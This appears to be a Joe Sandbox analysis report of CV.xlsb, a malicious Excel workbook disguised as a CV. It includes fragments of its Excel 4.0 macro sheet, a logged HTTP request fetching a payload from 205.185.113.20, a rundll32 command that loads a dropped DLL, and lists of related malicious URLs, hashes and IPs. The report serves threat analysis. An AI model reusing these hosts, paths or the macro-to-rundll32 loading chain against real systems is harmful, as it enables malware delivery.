Number of new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal76.expl.evad.winXLSB@3/4@0/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsb
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
• Excluded IPs from analysis (whitelisted): 13.88.21.125, 104.43.193.48, 52.109.32.27, 52.109.8.24, 52.109.12.21, 2.20.84.85, 51.11.168.160, 67.27.233.126, 8.253.204.120, 8.248.115.254, 67.27.233.254, 67.26.139.254, 20.54.26.129, 51.104.139.180, 92.122.213.247, 92.122.213.194
• Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, config.officeapps.live.com, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net

Note that the analysis ended on timeout and the EGA and HDC stages failed, so the function-coverage figures above (0 executed, 0 non-executed) reflect instrumentation limits, not an absence of behaviour.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
205.185.113.20 | myResume.xlsb | malicious | 205.185.113.20/BVd1qKwd
205.185.113.20 | myResume.xlsb | malicious | 205.185.113.20/cXQT5g
205.185.113.20 | myResume.xlsb | malicious | 205.185.113.20/cXQT5g
205.185.113.20 | myResume.xlsb | malicious | 205.185.113.20/cXQT5g
205.185.113.20 | myResume.xlsb | malicious | 205.185.113.20/cXQT5g
205.185.113.20 | myResume.xlsb | malicious | 205.185.113.20/cXQT5g
205.185.113.20 | myResume.xlsb | malicious | 205.185.113.20/cXQT5g
205.185.113.20 | myResume.xlsb | malicious | 205.185.113.20/cXQT5g
205.185.113.20 | myResume.xlsb | malicious | 205.185.113.20/cXQT5g
205.185.113.20 | myResume.xlsb | malicious | 205.185.113.20/cXQT5g
205.185.113.20 | myResume.xlsb | malicious | 205.185.113.20/cXQT5g
205.185.113.20 | myResume.xlsb | malicious | 205.185.113.20/cXQT5g
205.185.113.20 | myResume.xlsb | malicious | 205.185.113.20/cXQT5g
205.185.113.20 | myResume.xlsb | malicious | 205.185.113.20/cXQT5g
205.185.113.20 | myResume.xlsb | malicious | 205.185.113.20/cXQT5g
205.185.113.20 | myResume.xlsb | malicious | 205.185.113.20/cXQT5g
205.185.113.20 | myResume.xlsb | malicious | 205.185.113.20/cXQT5g
205.185.113.20 | myResume.xlsb | malicious | 205.185.113.20/cXQT5g
205.185.113.20 | myResume.xlsb | malicious | 205.185.113.20/cXQT5g
205.185.113.20 | myResume.xlsb | malicious | 205.185.113.20/cXQT5g

Twenty earlier analyses of a file named myResume.xlsb, all detected as malicious, fetched a payload from the same host under two distinct paths (/BVd1qKwd and /cXQT5g); the IP and both paths are the network indicators worth pivoting on for this campaign.

Domains

No context

ASN

Match | Associated Sample Name / URL | Detection | Context
PONYNETUS | https://papyrefb2tdk6czd.onion.ly/ | malicious | 198.251.89.118
PONYNETUS | https://ciadotgov4sjwlzihbbgxnqg3xiyrg7so2r2o3lt5wz5ypk4sxyjstad.onion.ly | malicious | 198.251.89.118
PONYNETUS | http://ciadotgov4sjwlzihbbgxnqg3xiyrg7so2r2o3lt5wz5ypk4sxyjstad.onion.ly | malicious | 198.251.89.118
PONYNETUS | SecuriteInfo.com.ArtemisA8D086952534.exe | malicious | 167.88.170.103
PONYNETUS | http://naturalhub-diet.world/shake.php?a=1nou&c=diet&s=330788,UEMRADAPDP38712 | malicious | 209.141.40.184
PONYNETUS | Quickbooks-52598NOV.wsf | malicious | 209.141.42.71
PONYNETUS | https://urlprotection-sjl.global.sonicwall.com/click?PV=1&MSGID=202011121700210567221&URLID=12&ESV=10.0.9.5115&IV=96C84E4D3CD6E1B3687B4725D49ACC48&TT=1605200441368&ESN=o9kvhmPqyp%2BcdCbr6%2B5AlC%2FDxZxbBUV7HS3EcP1G5pA%3D&KV=1536961729279&ENCODED_URL=https%3A%2F%2Fteamgrouppcl-my.sharepoint.com%2F%3Au%3A%2Fg%2Fpersonal%2Fnongluck_m_attconsult_com%2FEUMhZAOXwpNGi0mlED8_GS0BlNUmsBRsk_GjzqCnTE543g%3Fdownload%3D1%26utm_content%3DNewClient%26utm_campaign%3Dwebsite%26utm_source%3DJulyWazePromo%26utm_medium%3DEmail&HK=2880A45B85BD1D7F235772EACD5B24AA03960F780A5D1B62240B80C3C42285F3 | malicious | 209.141.42.71
PONYNETUS | E3FvBBM0A6.exe | malicious | 199.195.250.165
PONYNETUS | jtFF5EQoEE.exe | malicious | 209.141.38.71
PONYNETUS | myResume.xlsb | malicious | 205.185.113.20
PONYNETUS | WKTniKeGUx.exe | malicious | 199.195.250.165
PONYNETUS | Reference Number -MT103-002239389960011.exe | malicious | 167.88.160.137
PONYNETUS | https://bit.ly/3kP7Cn3 | malicious | 209.141.40.184
PONYNETUS | https://bit.ly/2HWBvnh | malicious | 209.141.40.184
PONYNETUS | run32dll.exe | malicious | 198.251.89.29
PONYNETUS | servicess64 - Copy.exe | malicious | 205.185.126.172
PONYNETUS | myResume.xlsb | malicious | 205.185.113.20
PONYNETUS | myResume.xlsb | malicious | 205.185.113.20
PONYNETUS | QvYfyDOcEdLRWwnkTRyImaBLGh.exe | malicious | 167.88.170.81
PONYNETUS | myResume.xlsb | malicious | 205.185.113.20

The ASN match is a weaker signal than the IP match: it only says that other malicious samples have used hosting in AS53667 (PONYNET), which is a general-purpose provider, so treat it as corroboration rather than as an indicator on its own.

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\2C22A230-8394-4D0B-8F76-0E2534DC8A73
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 129952
Entropy (8bit): 5.378334959361757
Encrypted: false
                                                                                                                                                    SSDEEP:1536:LcQceNWiA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:ZmQ9DQW+zBX8u
                                                                                                                                                    MD5:73F769F0BFC90108C482768AB66936C7
                                                                                                                                                    SHA1:C57F2DBBD12E985DF6B4B7CAFC31805CA5215887
                                                                                                                                                    SHA-256:6FD7E30D3DD4C3178363C959AD02986B709D8F2F516F5408FBD81458FF0250AB
                                                                                                                                                    SHA-512:E58FC93F16CE4374C71951E3639C5E7BEFD153999A9CA9C2CC6FE05CC1E79D9E7BFBC8967B061E753014723C79BC995C523DDE3C607035E567081F76895687E2
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-11-18T03:50:19">.. Build: 16.0.13515.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\A88F1E23.jpeg
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1011x567, frames 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):55961
                                                                                                                                                    Entropy (8bit):7.8745563773940725
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:QUQt43PNewplZDlm1ajiDPnp3AvLJ03ntpE3g+O0t2DoV:UwbZRQJAd0MrO0UEV
                                                                                                                                                    MD5:102DCD780DA80675F5038CFB42D936CE
                                                                                                                                                    SHA1:417033D6C45E4209909A2EF7B5436673A74FB164
                                                                                                                                                    SHA-256:88F6B392616EA29C03682E3EC079F58C5E8BDC18C7CCB09BA6D5DC0BEDC13EA8
                                                                                                                                                    SHA-512:6478CD1B6F256ABA81374018B751D4ABE03B99B6A1CCB528D97E2ADA7558373161F002CA7D8D6088E897390F9A0F2CE3E925C604B3F855C1EBAA04E53F01ECEF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
Preview: (JPEG binary data omitted)
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\93B10000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):212710
                                                                                                                                                    Entropy (8bit):7.959036658723784
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:iBSIHKSLky2ZOJAd0MrO0UEcXritjYcufzjXK:is1SLk1AJAdFrOpEcX9fzbK
                                                                                                                                                    MD5:406EB3570E89D41780BA695D62C6AD22
                                                                                                                                                    SHA1:2C541B97F8F1C8FB2E9CC06F5C214FC21BDCB978
                                                                                                                                                    SHA-256:A51BA5C748A9F72D146728D9A33E6352A714BC573905F9054646518DD32AD3E9
                                                                                                                                                    SHA-512:8D2E3634A03006F81B18F3CF6F050C919C19B7D5DBA55D382D0506849FF68B91290EC3A7CB3B1A37E36E4DFB7B634EB875073A99CACF3D1276F95C9E0EBD3238
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
Preview: (binary data omitted)
                                                                                                                                                    C:\Users\user\Desktop\~$CV.xlsb
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):165
                                                                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                    MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                    SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                    SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                    SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                    Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:Microsoft Excel 2007+
                                                                                                                                                    Entropy (8bit):7.953202693040947
                                                                                                                                                    TrID:
                                                                                                                                                    • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                                                    • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                    File name:CV.xlsb
                                                                                                                                                    File size:234519
                                                                                                                                                    MD5:97978d78a96b89671a7bcb1325ae9ed2
                                                                                                                                                    SHA1:7d3c43d1d8d4657ce177126bbae27647b9e02ee2
                                                                                                                                                    SHA256:3cbc9397d35ec1de513c7d7f747fb6b7773d468244b06bbfc60b4325f1e1b22b
                                                                                                                                                    SHA512:745add1a0d1731dd523926b882b16f84c7f53334f2f9a81a586b4ce38fcbb9fca7e5ddc5806b697243067261e5abfa9bd971563b9b011960d07d546d53a7a0de
                                                                                                                                                    SSDEEP:6144:IPpDLAdBYb0peGXmIJSWGEXGnHDm1ePd2ZOJAd0MrO0UE2i92:+pLIBYbSeGXmvEXGnHDvoAJAdFrOpEpQ
File Content Preview:PK..........!..*.=............[Content_Types].xml ...(

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                    Static OLE Info

                                                                                                                                                    General

                                                                                                                                                    Document Type:OpenXML
                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                    OLE File "CV.xlsb"

                                                                                                                                                    Indicators

                                                                                                                                                    Has Summary Info:
                                                                                                                                                    Application Name:
                                                                                                                                                    Encrypted Document:
                                                                                                                                                    Contains Word Document Stream:
                                                                                                                                                    Contains Workbook/Book Stream:
                                                                                                                                                    Contains PowerPoint Document Stream:
                                                                                                                                                    Contains Visio Document Stream:
                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                    Flash Objects Count:
                                                                                                                                                    Contains VBA Macros:

                                                                                                                                                    Macro 4.0 Code

Non-empty cells of the macro sheet, listed per row in sheet order (empty cells omitted):

Row 1: =APP.TITLE(BaaCKWySxWnNnysLuRBMSOZqFNOYvqTVCIbjZFzByEovDT) | i | =ALERT(vwuzXdkPcbruxpPdWHoqLnsGDlyYYzIVwRvUlMmxrK)
Row 2: 2 | e | =CLOSE.ALL() | J | =ALERT(an)
Row 3: =CANCEL.KEY(TRUE)

                                                                                                                                                    Network Behavior

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Nov 18, 2020 04:50:23.127257109 CET  49713        80         192.168.2.3     205.185.113.20
Nov 18, 2020 04:50:23.305577040 CET  80           49713      205.185.113.20  192.168.2.3
Nov 18, 2020 04:50:23.305809975 CET  49713        80         192.168.2.3     205.185.113.20
Nov 18, 2020 04:50:23.306298018 CET  49713        80         192.168.2.3     205.185.113.20
Nov 18, 2020 04:50:23.483510017 CET  80           49713      205.185.113.20  192.168.2.3
Nov 18, 2020 04:50:23.505260944 CET  80           49713      205.185.113.20  192.168.2.3
Nov 18, 2020 04:50:23.505366087 CET  49713        80         192.168.2.3     205.185.113.20
Nov 18, 2020 04:51:28.531632900 CET  80           49713      205.185.113.20  192.168.2.3
Nov 18, 2020 04:51:28.531857967 CET  49713        80         192.168.2.3     205.185.113.20
Nov 18, 2020 04:52:08.909399033 CET  49713        80         192.168.2.3     205.185.113.20
Nov 18, 2020 04:52:09.087167978 CET  80           49713      205.185.113.20  192.168.2.3

                                                                                                                                                    UDP Packets

Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Nov 18, 2020 04:50:05.484215021 CET  65110        53         192.168.2.3  8.8.8.8
Nov 18, 2020 04:50:05.521449089 CET  53           65110      8.8.8.8      192.168.2.3
Nov 18, 2020 04:50:06.552676916 CET  58361        53         192.168.2.3  8.8.8.8
Nov 18, 2020 04:50:06.580528021 CET  53           58361      8.8.8.8      192.168.2.3
Nov 18, 2020 04:50:07.593590975 CET  63492        53         192.168.2.3  8.8.8.8
Nov 18, 2020 04:50:07.633985996 CET  53           63492      8.8.8.8      192.168.2.3
Nov 18, 2020 04:50:08.609471083 CET  60831        53         192.168.2.3  8.8.8.8
Nov 18, 2020 04:50:08.636950970 CET  53           60831      8.8.8.8      192.168.2.3
Nov 18, 2020 04:50:10.046732903 CET  60100        53         192.168.2.3  8.8.8.8
Nov 18, 2020 04:50:10.073992014 CET  53           60100      8.8.8.8      192.168.2.3
Nov 18, 2020 04:50:10.920666933 CET  53195        53         192.168.2.3  8.8.8.8
Nov 18, 2020 04:50:10.947772980 CET  53           53195      8.8.8.8      192.168.2.3
Nov 18, 2020 04:50:17.092869997 CET  50141        53         192.168.2.3  8.8.8.8
Nov 18, 2020 04:50:17.128798008 CET  53           50141      8.8.8.8      192.168.2.3
Nov 18, 2020 04:50:18.731102943 CET  53023        53         192.168.2.3  8.8.8.8
Nov 18, 2020 04:50:18.767157078 CET  53           53023      8.8.8.8      192.168.2.3
Nov 18, 2020 04:50:18.965440035 CET  49563        53         192.168.2.3  8.8.8.8
Nov 18, 2020 04:50:19.000965118 CET  53           49563      8.8.8.8      192.168.2.3
Nov 18, 2020 04:50:19.350265026 CET  51352        53         192.168.2.3  8.8.8.8
Nov 18, 2020 04:50:19.388009071 CET  53           51352      8.8.8.8      192.168.2.3
Nov 18, 2020 04:50:20.365075111 CET  51352        53         192.168.2.3  8.8.8.8
Nov 18, 2020 04:50:20.400999069 CET  53           51352      8.8.8.8      192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:21.380361080 CET5135253192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:21.416122913 CET53513528.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:23.199695110 CET5934953192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:23.227179050 CET53593498.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:23.395859003 CET5135253192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:23.433897972 CET53513528.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:24.378360987 CET5708453192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:24.405793905 CET53570848.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:26.504067898 CET5882353192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:26.531493902 CET53588238.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:27.406240940 CET5135253192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:27.441749096 CET53513528.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:27.762345076 CET5756853192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:27.789632082 CET53575688.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:28.902792931 CET5054053192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:28.929817915 CET53505408.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:31.022787094 CET5436653192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:31.050216913 CET53543668.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:34.294689894 CET5303453192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:34.331670046 CET53530348.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:37.272268057 CET5776253192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:37.299457073 CET53577628.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:55.194458961 CET5543553192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:55.222264051 CET53554358.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:50:58.560962915 CET5071353192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:50:58.596832037 CET53507138.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:51:12.928491116 CET5613253192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:51:12.983022928 CET53561328.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:51:20.473980904 CET5898753192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:51:20.511296034 CET53589878.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:51:51.301814079 CET5657953192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:51:51.329812050 CET53565798.8.8.8192.168.2.3
                                                                                                                                                    Nov 18, 2020 04:51:52.896838903 CET6063353192.168.2.38.8.8.8
                                                                                                                                                    Nov 18, 2020 04:51:52.943226099 CET53606338.8.8.8192.168.2.3

HTTP Request Dependency Graph

• 205.185.113.20

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49713 | 205.185.113.20 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Nov 18, 2020 04:50:23.306298018 CET | 878 | OUT | GET /BVd1qKwd HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 205.185.113.20
Connection: Keep-Alive
Nov 18, 2020 04:50:23.505260944 CET | 879 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 18 Nov 2020 03:50:23 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Cache-Control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0
Expires: 0
Last-Modified: Wed, 18 Nov 2020 03:50:23 GMT
Pragma: no-cache
Set-Cookie: _subid=1m9efdt1oal;Expires=Saturday, 19-Dec-2020 03:50:23 GMT;Max-Age=2678400;Path=/
Vary: Accept-Encoding


Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Behavior

System Behavior

General

Start time: 04:50:16
Start date: 18/11/2020
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase: 0x1a0000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 04:50:22
Start date: 18/11/2020
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer
Imagebase: 0x1210000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis